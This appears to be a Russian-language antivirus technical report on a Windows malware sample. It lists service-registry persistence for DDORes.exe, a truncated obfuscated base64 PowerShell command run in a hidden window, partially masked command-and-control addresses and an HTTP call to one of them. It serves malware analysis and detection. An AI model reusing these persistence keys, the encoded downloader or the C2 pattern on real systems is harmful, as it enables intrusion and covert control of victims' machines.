Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\DDORes] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\DDORes] 'ImagePath' = '"<SYSTEM32>\atl110\DDORes.exe"'
- 'DDORes' "<SYSTEM32>\atl110\DDORes.exe"
- 'DDORes' <SYSTEM32>\atl110\DDORes.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAFUAUwBDAEcAZwBzAGMAPQAnAFkAUABKAFQASQBiAHUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBVAGAAUgBgAEkAVABZAFAAYABSAE8AYABUAE8AQwBvAGwAIgAgAD...
- %HOMEPATH%\572.exe
- <SYSTEM32>\atl110\ddores.exe
- %HOMEPATH%\572.exe в <SYSTEM32>\atl110\ddores.exe
- '71.##.180.213':80
- '18#.#6.148.68':443
- http://18#.##.148.68:443/8krrsY83KXwzXncYYm/MFCYq3VFUvxioXWY/MP1rf3XzjSD2z7F/q8Qj8xrclhq/CyBpqBEFYBaaYmEVm9/ via 18#.#6.148.68
- DNS ASK di##ain.es
- '%HOMEPATH%\572.exe'
- '<SYSTEM32>\atl110\ddores.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAFUAUwBDAEcAZwBzAGMAPQAnAFkAUABKAFQASQBiAHUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBVAGAAUgBgAEkAVABZAFAAYABSAE8AYABUAE8AQwBvAGwAIgAgAD...' (со скрытым окном)